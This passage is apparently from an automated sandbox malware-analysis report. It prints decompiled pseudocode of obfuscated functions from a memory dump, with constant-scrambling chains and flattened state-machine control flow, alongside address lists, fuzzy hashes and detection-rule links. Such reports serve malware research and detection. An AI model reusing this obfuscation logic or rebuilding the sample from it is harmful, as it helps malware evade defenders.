							}
						}
					}
					return _t205;
				}
				E100175CD(_v76, _t205, _v80,  &_v20, _v48, _t188, _t188, _a16, _v24, _v52, _t188, _v28, _v56);
				_t208 =  &(_t208[0xb]);
				 *_t186 = _v20;
				_t188 = 0x355e3c8;
				goto L11;
			}

0x1001a28c
0x1001a293
0x1001a297
0x1001a298
0x1001a29c
0x1001a2a0
0x1001a2a1
0x1001a2a2
0x1001a2a7
0x1001a2b5
0x1001a2b8
0x1001a2bb
0x1001a2bd
0x1001a2c2
0x1001a2c4
0x1001a2c5
0x1001a2c6
0x1001a2ce
0x1001a2d3
0x1001a2d8
0x1001a2e0
0x1001a2e5
0x1001a2ed
0x1001a2f5
0x1001a2fd
0x1001a305
0x1001a30d
0x1001a315
0x1001a31d
0x1001a325
0x1001a32d
0x1001a335
0x1001a33a
0x1001a342
0x1001a34f
0x1001a350
0x1001a354
0x1001a35c
0x1001a364
0x1001a36c
0x1001a374
0x1001a37c
0x1001a384
0x1001a38c
0x1001a394
0x1001a399
0x1001a3a1
0x1001a3a9
0x1001a3ae
0x1001a3b6
0x1001a3be
0x1001a3cb
0x1001a3cf
0x1001a3d7
0x1001a3df
0x1001a3ed
0x1001a3f1
0x1001a3f9
0x1001a3fe
0x1001a406
0x1001a40e
0x1001a416
0x1001a41b
0x1001a423
0x1001a42b
0x1001a433
0x1001a43b
0x1001a443
0x1001a44b
0x1001a460
0x1001a465
0x1001a46b
0x1001a473
0x1001a47b
0x1001a487
0x1001a48f
0x1001a493
0x1001a49b
0x1001a4a3
0x1001a4ab
0x1001a4b3
0x1001a4bb
0x1001a4c8
0x1001a4cc
0x1001a4d4
0x1001a4dc
0x1001a4e4
0x1001a4ec
0x1001a4f4
0x1001a502
0x1001a580
0x00000000
0x1001a504
0x1001a506
0x1001a565
0x1001a570
0x1001a572
0x1001a577
0x1001a579
0x00000000
0x1001a579
0x1001a508
0x1001a50e
0x1001a5cd
0x1001a5d3
0x00000000
0x00000000
0x1001a514
0x1001a541
0x1001a546
0x1001a54b
0x1001a551
0x00000000
0x1001a551
0x1001a54b
0x1001a50e
0x1001a506
0x1001a5e2
0x1001a5e2
0x1001a5b7
0x1001a5c3
0x1001a5c6
0x1001a5c8
0x00000000

Strings

B, xrefs: 1001A2D3
*, xrefs: 1001A384
ZZ, xrefs: 1001A3AE
", xrefs: 1001A42B

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: "$B$ZZ$*
API String ID: 0-4193000340
Opcode ID: 25edca18917434abf10baa01cd03c91452d84c785c482e77452ccfb7e7df4fa3
Instruction ID: a8377b55275f92596b398e6d143b62f2100d83835ac2a2d227010931a2fc0a45
Opcode Fuzzy Hash: 25edca18917434abf10baa01cd03c91452d84c785c482e77452ccfb7e7df4fa3
Instruction Fuzzy Hash: 4E810EB1508341AFD394CF65C94A81BFBF2FBD9748F004A1DF6959A220D3B5DA498F42

Uniqueness

Uniqueness Score: -1.00%

Function 100108D9, Relevance: 5.2, Strings: 4, Instructions: 182
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E100108D9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t154;
				signed int _t167;
				void* _t168;
				void* _t176;
				char* _t181;
				signed int _t193;
				signed int _t194;
				signed int* _t198;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t154);
				_v132 = _v132 & 0x00000000;
				_t198 =  &(( &_v208)[5]);
				_v136 = 0xc6b6af;
				_v172 = 0xa195f8;
				_t176 = 0xc0ed1a1;
				_v172 = _v172 ^ 0xb3904651;
				_v172 = _v172 >> 0xe;
				_v172 = _v172 ^ 0x000f1b48;
				_v148 = 0xf26840;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x00779625;
				_v176 = 0x231b51;
				_v176 = _v176 | 0x09c72203;
				_v176 = _v176 + 0x5eaf;
				_v176 = _v176 ^ 0x09efd443;
				_v200 = 0x1d4e9d;
				_v200 = _v200 >> 0xf;
				_v200 = _v200 | 0xe05d433c;
				_t31 =  &_v200; // 0xe05d433c
				_t193 = 0x29;
				_v200 =  *_t31 * 0x23;
				_v200 = _v200 ^ 0xaccd5629;
				_v188 = 0x47783f;
				_t36 =  &_v188; // 0x47783f
				_v188 =  *_t36 * 0x7e;
				_t38 =  &_v188; // 0x47783f
				_v188 =  *_t38 * 0x11;
				_v188 = _v188 ^ 0x560697a4;
				_v152 = 0x2b8489;
				_v152 = _v152 >> 0xc;
				_v152 = _v152 ^ 0x0002f3d6;
				_v164 = 0xe593b1;
				_v164 = _v164 ^ 0x0346d768;
				_v164 = _v164 ^ 0x03adbea0;
				_v180 = 0x61fe9e;
				_v180 = _v180 + 0xffffe3ac;
				_v180 = _v180 * 0x45;
				_v180 = _v180 ^ 0x1a68455f;
				_v192 = 0x35ae36;
				_v192 = _v192 >> 8;
				_v192 = _v192 ^ 0xa635e96b;
				_v192 = _v192 ^ 0xa63bc07c;
				_v184 = 0xe94537;
				_v184 = _v184 ^ 0x95fe51e4;
				_v184 = _v184 | 0x0ca62ca8;
				_v184 = _v184 ^ 0x9db21a20;
				_v160 = 0x900e72;
				_v160 = _v160 + 0x37a4;
				_v160 = _v160 ^ 0x0094be69;
				_v144 = 0x56c44e;
				_v144 = _v144 * 0x7b;
				_v144 = _v144 ^ 0x29bcab94;
				_v168 = 0x701011;
				_v168 = _v168 ^ 0x250827f2;
				_v168 = _v168 ^ 0x2e086b40;
				_v168 = _v168 ^ 0x0b7d12d5;
				_v208 = 0xbd28c7;
				_v208 = _v208 + 0xffffc6c9;
				_v208 = _v208 + 0xfffffc0f;
				_v208 = _v208 * 0x76;
				_v208 = _v208 ^ 0x5710fbc7;
				_v196 = 0x45ba52;
				_v196 = _v196 >> 1;
				_v196 = _v196 / _t193;
				_t194 = 0x77;
				_v196 = _v196 * 0x24;
				_v196 = _v196 ^ 0x001dcf15;
				_v156 = 0x4a8768;
				_v156 = _v156 * 0x2b;
				_v156 = _v156 ^ 0x0c8a711e;
				_v204 = 0xe8f4a8;
				_v204 = _v204 ^ 0x996cf384;
				_t167 = _v204 / _t194;
				_v204 = _t167;
				_v204 = _v204 | 0x37a2ba1a;
				_v204 = _v204 ^ 0x37e6009d;
				while(_t176 != 0x34bff80) {
					if(_t176 == 0x94d43e0) {
						__eflags = _v128;
						_t181 =  &_v128;
						if(_v128 != 0) {
							do {
								_t167 =  *_t181;
								__eflags = _t167 - 0x30;
								if(_t167 < 0x30) {
									L10:
									__eflags = _t167 - 0x61;
									if(_t167 < 0x61) {
										L12:
										__eflags = _t167 - 0x41;
										if(_t167 < 0x41) {
											L14:
											 *_t181 = 0x58;
										} else {
											__eflags = _t167 - 0x5a;
											if(_t167 > 0x5a) {
												goto L14;
											}
										}
									} else {
										__eflags = _t167 - 0x7a;
										if(_t167 > 0x7a) {
											goto L12;
										}
									}
								} else {
									__eflags = _t167 - 0x39;
									if(_t167 > 0x39) {
										goto L10;
									}
								}
								_t181 = _t181 + 1;
								__eflags =  *_t181;
							} while ( *_t181 != 0);
						}
						_t176 = 0x34bff80;
						continue;
					} else {
						if(_t176 == 0xc0ed1a1) {
							_t176 = 0xf1bb4bb;
							continue;
						} else {
							if(_t176 == 0xf1bb4bb) {
								_v140 = 0x80;
								_t167 = E100116DA(_v172, _v148, _v176,  &_v140,  &_v128, _v200);
								_t198 =  &(_t198[4]);
								_t176 = 0x94d43e0;
								continue;
							}
						}
					}
					L18:
					__eflags = _t176 - 0x3192ed0;
					if(_t176 != 0x3192ed0) {
						continue;
					}
					return _t167;
				}
				_push(_v180);
				_push(_v164);
				_push(_v152);
				_t168 = E10008650(_v188, 0x10001248);
				E1001FAD7(_v192, _v160, __eflags, _v144, _v168, _t168, _a4,  &_v128, _v208, E10002617());
				_t167 = E1000B952(_v196, _t168, _v156, _v204);
				_t198 =  &(_t198[0xc]);
				_t176 = 0x3192ed0;
				goto L18;
			}

0x100108e3
0x100108ea
0x100108f1
0x100108f8
0x100108f9
0x100108fa
0x100108ff
0x10010904
0x10010907
0x10010911
0x10010919
0x1001091e
0x10010926
0x1001092b
0x10010933
0x1001093b
0x1001093f
0x10010947
0x1001094f
0x10010957
0x1001095f
0x10010967
0x1001096f
0x10010974
0x1001097c
0x10010983
0x10010984
0x10010988
0x10010990
0x10010998
0x1001099d
0x100109a1
0x100109a6
0x100109aa
0x100109b2
0x100109ba
0x100109bf
0x100109c7
0x100109cf
0x100109d7
0x100109df
0x100109e7
0x100109f4
0x100109f8
0x10010a00
0x10010a08
0x10010a0d
0x10010a15
0x10010a1d
0x10010a25
0x10010a2d
0x10010a35
0x10010a3d
0x10010a45
0x10010a4d
0x10010a55
0x10010a62
0x10010a66
0x10010a6e
0x10010a76
0x10010a7e
0x10010a86
0x10010a8e
0x10010a96
0x10010a9e
0x10010aab
0x10010aaf
0x10010ab7
0x10010abf
0x10010ac9
0x10010ad6
0x10010ae6
0x10010aea
0x10010af2
0x10010aff
0x10010b03
0x10010b0b
0x10010b13
0x10010b1f
0x10010b21
0x10010b25
0x10010b2d
0x10010b35
0x10010b3b
0x10010b7f
0x10010b84
0x10010b88
0x10010b8a
0x10010b8a
0x10010b8c
0x10010b8e
0x10010b94
0x10010b94
0x10010b96
0x10010b9c
0x10010b9c
0x10010b9e
0x10010ba4
0x10010ba4
0x10010ba0
0x10010ba0
0x10010ba2
0x00000000
0x00000000
0x10010ba2
0x10010b98
0x10010b98
0x10010b9a
0x00000000
0x00000000
0x10010b9a
0x10010b90
0x10010b90
0x10010b92
0x00000000
0x00000000
0x10010b92
0x10010ba7
0x10010ba8
0x10010ba8
0x10010b8a
0x10010bad
0x00000000
0x10010b3d
0x10010b43
0x10010b7b
0x00000000
0x10010b45
0x10010b47
0x10010b55
0x10010b6f
0x10010b74
0x10010b77
0x00000000
0x10010b77
0x10010b47
0x10010b43
0x10010c18
0x10010c18
0x10010c1e
0x00000000
0x00000000
0x10010c2e
0x10010c2e
0x10010bb1
0x10010bba
0x10010bbe
0x10010bc6
0x10010bf8
0x10010c0b
0x10010c10
0x10010c13
0x00000000

Strings

<C], xrefs: 1001097C
?xG, xrefs: 10010998
7E, xrefs: 10010A1D
CM, xrefs: 10010ADC

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: 7E$<C]$?xG$CM
API String ID: 0-2054502357
Opcode ID: 944b076de5e98dd44a1f26a68f805efc2af74408f1313c1362247b6176f03487
Instruction ID: 2e49c576230d99da8ddc480f508184437576fab9815765df6992fb213bf175d3
Opcode Fuzzy Hash: 944b076de5e98dd44a1f26a68f805efc2af74408f1313c1362247b6176f03487
Instruction Fuzzy Hash: 5E911E715083819FC758CF24C98691BBBE1FBC5348F505A0EF5D69A260D3B5CA8A8F83

Uniqueness

Uniqueness Score: -1.00%

Function 1000C87E, Relevance: 5.1, Strings: 4, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1000C87E() {
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _t115;
				void* _t118;
				void* _t120;
				signed int _t121;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				intOrPtr _t144;
				signed int* _t146;

				_t146 =  &_v572;
				_v532 = 0xaa6fa;
				_t144 = 0;
				_t120 = 0xc4ceb95;
				_v528 = 0;
				_v536 = 0x2b9453;
				_v536 = _v536 | 0xc9921312;
				_v536 = _v536 ^ 0xc9bbdd06;
				_v568 = 0xf3b38b;
				_t140 = 0x59;
				_v568 = _v568 / _t140;
				_v568 = _v568 + 0xda3c;
				_t141 = 0x52;
				_v568 = _v568 * 0x69;
				_v568 = _v568 ^ 0x0174fce4;
				_v540 = 0x919cc;
				_v540 = _v540 + 0xffff1832;
				_v540 = _v540 ^ 0x0000d3f4;
				_v548 = 0x38db11;
				_v548 = _v548 * 0x57;
				_v548 = _v548 / _t141;
				_v548 = _v548 ^ 0x0037989a;
				_v556 = 0x9109e3;
				_v556 = _v556 << 0xf;
				_v556 = _v556 + 0xffff33d2;
				_v556 = _v556 ^ 0x84f7550b;
				_v560 = 0x4df37d;
				_v560 = _v560 + 0x1e47;
				_v560 = _v560 + 0xffffb68b;
				_v560 = _v560 ^ 0x004c4a99;
				_v544 = 0xfd00a3;
				_v544 = _v544 << 0xf;
				_t142 = 0x7f;
				_v544 = _v544 / _t142;
				_v544 = _v544 ^ 0x010c953c;
				_v572 = 0xd3ab56;
				_v572 = _v572 ^ 0x1989e46b;
				_v572 = _v572 << 5;
				_v572 = _v572 >> 0xc;
				_v572 = _v572 ^ 0x000d2719;
				_v564 = 0x8a64f3;
				_v564 = _v564 + 0xffffc19d;
				_v564 = _v564 ^ 0x008f3d88;
				_t143 = _v564;
				while(_t120 != 0x164be30) {
					if(_t120 == 0x9164a1a) {
						E10020488(_v572, _v564);
						_t120 = 0x164be30;
						continue;
					} else {
						if(_t120 == 0x926290c) {
							_t115 = E10009D0A();
							_t143 = _t115;
							if(_t115 != 0) {
								_t120 = 0xd383d3d;
								continue;
							}
						} else {
							if(_t120 == 0xa0e6743) {
								E10001A5C( &_v524, _v560, _v544);
								_t120 = 0x9164a1a;
								continue;
							} else {
								if(_t120 == 0xc4ceb95) {
									_t120 = 0x926290c;
									continue;
								} else {
									if(_t120 != 0xd383d3d) {
										L15:
										if(_t120 != 0xd6f6b23) {
											continue;
										}
									} else {
										_t118 = E1000A4AA(_v568,  &_v524, _v540, _t120, _t143, _v548, _v556);
										_t146 =  &(_t146[5]);
										if(_t118 != 0) {
											_t120 = 0xa0e6743;
											continue;
										}
									}
								}
							}
						}
					}
					return _t144;
				}
				_v552 = 0x2c0fb1;
				_v552 = _v552 ^ 0x8d5a2018;
				_t121 = 0x38;
				_v552 = _v552 / _t121;
				_v552 = _v552 ^ 0x28a1ae72;
				_t144 =  ==  ? 1 : _t144;
				_t120 = 0xd6f6b23;
				goto L15;
			}

0x1000c87e
0x1000c884
0x1000c891
0x1000c893
0x1000c898
0x1000c89c
0x1000c8a4
0x1000c8ac
0x1000c8b4
0x1000c8c3
0x1000c8c8
0x1000c8ce
0x1000c8db
0x1000c8de
0x1000c8e2
0x1000c8ea
0x1000c8f2
0x1000c8fa
0x1000c902
0x1000c90f
0x1000c91b
0x1000c91f
0x1000c927
0x1000c92f
0x1000c934
0x1000c93c
0x1000c944
0x1000c94c
0x1000c954
0x1000c95c
0x1000c964
0x1000c96c
0x1000c975
0x1000c978
0x1000c97c
0x1000c984
0x1000c98c
0x1000c994
0x1000c999
0x1000c99e
0x1000c9a6
0x1000c9ae
0x1000c9b6
0x1000c9c6
0x1000c9ca
0x1000c9dc
0x1000ca7b
0x1000ca83
0x00000000
0x1000c9e2
0x1000c9e8
0x1000ca5c
0x1000ca61
0x1000ca65
0x1000ca67
0x00000000
0x1000ca67
0x1000c9ea
0x1000c9f0
0x1000ca46
0x1000ca4e
0x00000000
0x1000c9f2
0x1000c9f8
0x1000ca33
0x00000000
0x1000c9fa
0x1000ca00
0x1000cac5
0x1000cacb
0x00000000
0x00000000
0x1000ca06
0x1000ca1c
0x1000ca21
0x1000ca26
0x1000ca2c
0x00000000
0x1000ca2c
0x1000ca26
0x1000ca00
0x1000c9f8
0x1000c9f0
0x1000c9e8
0x1000cadd
0x1000cadd
0x1000ca8d
0x1000ca97
0x1000caa5
0x1000caaa
0x1000caaf
0x1000cabd
0x1000cac0
0x00000000

Strings

==8, xrefs: 1000CA67
#ko, xrefs: 1000CAC5
#ko, xrefs: 1000CAC0
==8, xrefs: 1000C9FA

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: #ko$#ko$==8$==8
API String ID: 0-3786431558
Opcode ID: 11da1fa8a00f2f023feaec6b54d27dbc8ca8c84dcb5a9a28a9b0fa26a843a6a9
Instruction ID: d88a141b502c07e475b52f4737ac113f282c511325217f69f4ca40b45975c516
Opcode Fuzzy Hash: 11da1fa8a00f2f023feaec6b54d27dbc8ca8c84dcb5a9a28a9b0fa26a843a6a9
Instruction Fuzzy Hash: EE51AE316083498FC348CF25C49491FBBE2FBD9798F104A1EF5CA96265D770CA498B87

Uniqueness

Uniqueness Score: -1.00%

Function 1000CD42, Relevance: 4.0, Strings: 3, Instructions: 242
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000CD42(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v12;
				intOrPtr _v36;
				char _v40;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t213;
				void* _t226;
				signed int _t231;
				signed int _t233;
				char* _t235;
				signed int _t236;
				intOrPtr _t243;
				intOrPtr* _t246;
				void* _t248;
				signed int _t249;
				intOrPtr _t259;
				intOrPtr _t275;
				intOrPtr* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				void* _t282;
				void* _t283;

				_t277 = _a8;
				_t246 = __ecx;
				_push(_a12);
				_push(_t277);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t213);
				_v68 = 0x8e8090;
				_t275 = 0;
				_v64 = 0;
				_t283 = _t282 + 0x14;
				_v140 = 0xaad4a5;
				_v140 = _v140 >> 5;
				_t248 = 0xb5ba21f;
				_v140 = _v140 + 0xffff9191;
				_v140 = _v140 ^ 0x0004e836;
				_v124 = 0x7b74e4;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 ^ 0x000003cb;
				_v152 = 0xfd9374;
				_v152 = _v152 << 7;
				_v152 = _v152 << 4;
				_v152 = _v152 << 1;
				_v152 = _v152 ^ 0xd93f2751;
				_v116 = 0xb4b533;
				_v116 = _v116 + 0xffff084c;
				_v116 = _v116 ^ 0x00b38a12;
				_v132 = 0x42664d;
				_v132 = _v132 + 0xffff3191;
				_v132 = _v132 + 0x9c0a;
				_v132 = _v132 ^ 0x004f998c;
				_v164 = 0x7b481f;
				_t278 = 0x2c;
				_v164 = _v164 / _t278;
				_v164 = _v164 ^ 0xbb32996a;
				_v164 = _v164 | 0xd2c226c9;
				_v164 = _v164 ^ 0xfbf1af7f;
				_v148 = 0xec59c3;
				_v148 = _v148 + 0xffffe4d1;
				_v148 = _v148 + 0xffffd0e9;
				_v148 = _v148 ^ 0x5c359aa2;
				_v148 = _v148 ^ 0x5cdbb1f7;
				_v156 = 0xced718;
				_v156 = _v156 >> 2;
				_v156 = _v156 + 0x4ab6;
				_v156 = _v156 << 7;
				_v156 = _v156 ^ 0x1a0ff154;
				_v108 = 0x8e95de;
				_v108 = _v108 + 0xc634;
				_v108 = _v108 ^ 0x00821e81;
				_v92 = 0x947718;
				_v92 = _v92 + 0xffffaff3;
				_v92 = _v92 ^ 0x0099bdc4;
				_v172 = 0xda941d;
				_v172 = _v172 + 0xffff3955;
				_v172 = _v172 >> 2;
				_v172 = _v172 * 0x25;
				_v172 = _v172 ^ 0x07d5a81f;
				_v100 = 0xaa262f;
				_v100 = _v100 << 7;
				_v100 = _v100 ^ 0x551c5dc9;
				_v96 = 0x44d055;
				_v96 = _v96 + 0xf6f1;
				_v96 = _v96 ^ 0x00426cf0;
				_v144 = 0x987629;
				_v144 = _v144 ^ 0x5049c379;
				_v144 = _v144 << 5;
				_v144 = _v144 * 0x6f;
				_v144 = _v144 ^ 0x5db58abe;
				_v128 = 0xb22dd9;
				_v128 = _v128 << 0xd;
				_t279 = 0x19;
				_v128 = _v128 / _t279;
				_v128 = _v128 ^ 0x02cd90c4;
				_v136 = 0x16da44;
				_v136 = _v136 << 0xe;
				_t280 = 0x70;
				_v136 = _v136 * 0x67;
				_v136 = _v136 ^ 0x745fdf33;
				_v168 = 0x7898ac;
				_v168 = _v168 >> 2;
				_v168 = _v168 + 0xa827;
				_v168 = _v168 | 0xd397dfac;
				_v168 = _v168 ^ 0xd393e2ae;
				_v88 = 0x6dfb59;
				_v88 = _v88 | 0xe5a5f780;
				_v88 = _v88 ^ 0xe5ec3de9;
				_v104 = 0xf7518e;
				_v104 = _v104 / _t280;
				_v104 = _v104 ^ 0x0006a113;
				_v160 = 0xf69bf2;
				_v160 = _v160 * 0x24;
				_v160 = _v160 + 0x86e5;
				_v160 = _v160 + 0xffff1288;
				_v160 = _v160 ^ 0x22abcabd;
				_v112 = 0x6dc7bd;
				_v112 = _v112 ^ 0x745ad8d5;
				_v112 = _v112 ^ 0x7432c7c3;
				_v120 = 0x105e4d;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x20b9ee4d;
				while(_t248 != 0x1cea864) {
					if(_t248 == 0x2c6f853) {
						if(E10016ACA( &_v84, _v152,  &_v76, _v116) == 0) {
							L26:
							return _t275;
						}
						_t248 = 0x4daef0d;
						continue;
					}
					if(_t248 == 0x4daef0d) {
						_t231 = E10011EFC(_v132,  &_v76, _v164,  &_v60, _v148);
						_t283 = _t283 + 0xc;
						asm("sbb ecx, ecx");
						_t248 = ( ~_t231 & 0xf9b1406f) + 0x81d67f5;
						continue;
					}
					if(_t248 == 0x81d67f5) {
						E100088FC(_v104, _v160, _v112, _v120, _v76);
						goto L26;
					}
					if(_t248 == 0xb5ba21f) {
						_t248 = 0xc4dde08;
						continue;
					}
					if(_t248 != 0xc4dde08) {
						L23:
						if(_t248 != 0xe92c33a) {
							continue;
						}
						goto L26;
					}
					_t233 =  *((intOrPtr*)(_t246 + 4));
					_t259 =  *_t246;
					_v80 = _t233;
					_v84 = _t259;
					_t235 = _t233 - 1 + _t259;
					while(_t235 > _t259) {
						if( *_t235 == 0) {
							break;
						}
						_t235 = _t235 - 1;
					}
					_t236 = _t235 - _t259;
					_v80 = _t236;
					if(_t236 == 0) {
						L14:
						_t248 = 0x2c6f853;
						continue;
					}
					while(_v80 % _v124 != _v140) {
						_t179 =  &_v80;
						 *_t179 = _v80 - 1;
						if( *_t179 != 0) {
							continue;
						}
						goto L14;
					}
					goto L14;
				}
				_t249 = _v156;
				_t226 = E1000B9D5(_t249,  &_v12, _v108,  &_v40, _v92);
				_t283 = _t283 + 0xc;
				if(_t226 != 0) {
					_push(_t249);
					_t243 = E100134E7(_t249, _v36);
					_t283 = _t283 + 0xc;
					 *_t277 = _t243;
					if(_t243 != 0) {
						E100168F4(_v36,  *_t277, _v128, _v136, _v168, _v40, _v88);
						_t283 = _t283 + 0x14;
						 *((intOrPtr*)(_t277 + 4)) = _v36;
						_t275 = 1;
					}
				}
				_t248 = 0x81d67f5;
				goto L23;
			}

0x1000cd4b
0x1000cd52
0x1000cd55
0x1000cd5c
0x1000cd5d
0x1000cd64
0x1000cd65
0x1000cd66
0x1000cd6b
0x1000cd76
0x1000cd78
0x1000cd7f
0x1000cd82
0x1000cd8c
0x1000cd91
0x1000cd96
0x1000cd9e
0x1000cda6
0x1000cdae
0x1000cdb3
0x1000cdbb
0x1000cdc3
0x1000cdc8
0x1000cdcd
0x1000cdd1
0x1000cdd9
0x1000cde1
0x1000cde9
0x1000cdf1
0x1000cdf9
0x1000ce01
0x1000ce09
0x1000ce11
0x1000ce1f
0x1000ce22
0x1000ce26
0x1000ce2e
0x1000ce36
0x1000ce3e
0x1000ce46
0x1000ce4e
0x1000ce56
0x1000ce5e
0x1000ce66
0x1000ce6e
0x1000ce73
0x1000ce7b
0x1000ce80
0x1000ce88
0x1000ce90
0x1000ce98
0x1000cea0
0x1000cea8
0x1000ceb0
0x1000ceb8
0x1000cec0
0x1000cec8
0x1000ced2
0x1000ced6
0x1000cede
0x1000cee6
0x1000ceeb
0x1000cef3
0x1000cefb
0x1000cf03
0x1000cf0b
0x1000cf13
0x1000cf1b
0x1000cf25
0x1000cf29
0x1000cf31
0x1000cf39
0x1000cf46
0x1000cf4b
0x1000cf51
0x1000cf59
0x1000cf61
0x1000cf6b
0x1000cf6c
0x1000cf70
0x1000cf78
0x1000cf80
0x1000cf85
0x1000cf8d
0x1000cf95
0x1000cf9d
0x1000cfa5
0x1000cfad
0x1000cfb5
0x1000cfc8
0x1000cfcc
0x1000cfd4
0x1000cfe1
0x1000cfe5
0x1000cfed
0x1000cff5
0x1000cffd
0x1000d005
0x1000d00d
0x1000d015
0x1000d01d
0x1000d022
0x1000d02a
0x1000d03c
0x1000d103
0x1000d1c2
0x1000d1ce
0x1000d1ce
0x1000d109
0x00000000
0x1000d109
0x1000d048
0x1000d0ce
0x1000d0d3
0x1000d0da
0x1000d0e2
0x00000000
0x1000d0e2
0x1000d04c
0x1000d1ba
0x00000000
0x1000d1bf
0x1000d058
0x1000d0a9
0x00000000
0x1000d0a9
0x1000d060
0x1000d198
0x1000d19e
0x00000000
0x00000000
0x00000000
0x1000d1a4
0x1000d066
0x1000d069
0x1000d06b
0x1000d070
0x1000d074
0x1000d07e
0x1000d07b
0x00000000
0x00000000
0x1000d07d
0x1000d07d
0x1000d082
0x1000d084
0x1000d088
0x1000d0a2
0x1000d0a2
0x00000000
0x1000d0a2
0x1000d08a
0x1000d09c
0x1000d09c
0x1000d0a0
0x00000000
0x00000000
0x00000000
0x1000d0a0
0x00000000
0x1000d08a
0x1000d123
0x1000d12e
0x1000d133
0x1000d138
0x1000d14a
0x1000d153
0x1000d158
0x1000d15b
0x1000d15f
0x1000d181
0x1000d18f
0x1000d192
0x1000d195
0x1000d195
0x1000d15f
0x1000d196
0x00000000

Strings

t{, xrefs: 1000CDA6
=, xrefs: 1000CFAD
MfB, xrefs: 1000CDF1

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: MfB$=$t{
API String ID: 0-1845617614
Opcode ID: 2035939afc4b34680442ab9314c514b4572955cd37b6f4c952d55cc999db787e
Instruction ID: fec5183eebfd18ac9ff17d68d4c492939607750d1b2c50171fafeeecc33180f4
Opcode Fuzzy Hash: 2035939afc4b34680442ab9314c514b4572955cd37b6f4c952d55cc999db787e
Instruction Fuzzy Hash: 64B120715083819BE364CF25C889A1FFBE1FBC4788F508A1EF59A86264D7B19909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 100179EC, Relevance: 4.0, Strings: 3, Instructions: 233
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E100179EC() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				unsigned int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _t226;
				signed int _t230;
				void* _t231;
				void* _t234;
				signed int _t238;
				signed int _t240;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t263;
				void* _t266;
				void* _t268;
				signed int* _t273;

				_t273 =  &_v660;
				_v612 = 0xa7cb94;
				_v612 = _v612 + 0xffff6fa8;
				_v612 = _v612 + 0xffff7fef;
				_v612 = _v612 ^ 0x00a6bbab;
				_v584 = 0x3ca811;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 ^ 0x000000f3;
				_v604 = 0xd86a04;
				_v604 = _v604 + 0x7d14;
				_v604 = _v604 << 6;
				_v604 = _v604 ^ 0x3639c603;
				_v648 = 0xd485cb;
				_v648 = _v648 + 0xffff45f7;
				_t242 = 0x26;
				_v648 = _v648 / _t242;
				_v648 = _v648 >> 0x10;
				_t240 = 0;
				_v648 = _v648 ^ 0x00073d18;
				_t266 = 0x5aedfcc;
				_v656 = 0xed84aa;
				_v656 = _v656 << 4;
				_v656 = _v656 | 0x873d5599;
				_v656 = _v656 ^ 0x8a2b81c7;
				_v656 = _v656 ^ 0x05d3d365;
				_v632 = 0x60ac05;
				_t243 = 0x59;
				_v632 = _v632 * 0x7e;
				_v632 = _v632 * 0x72;
				_v632 = _v632 | 0x89d1a7b1;
				_v632 = _v632 ^ 0xb9f68fc5;
				_v600 = 0x800255;
				_v600 = _v600 >> 9;
				_v600 = _v600 ^ 0x000effb6;
				_v640 = 0x82da0a;
				_v640 = _v640 / _t243;
				_t244 = 0x47;
				_v640 = _v640 * 0x67;
				_v640 = _v640 ^ 0xf654772a;
				_v640 = _v640 ^ 0xf6c359b7;
				_v628 = 0xf4d766;
				_v628 = _v628 / _t244;
				_v628 = _v628 + 0x3233;
				_v628 = _v628 ^ 0x0003edb6;
				_v592 = 0x774c5;
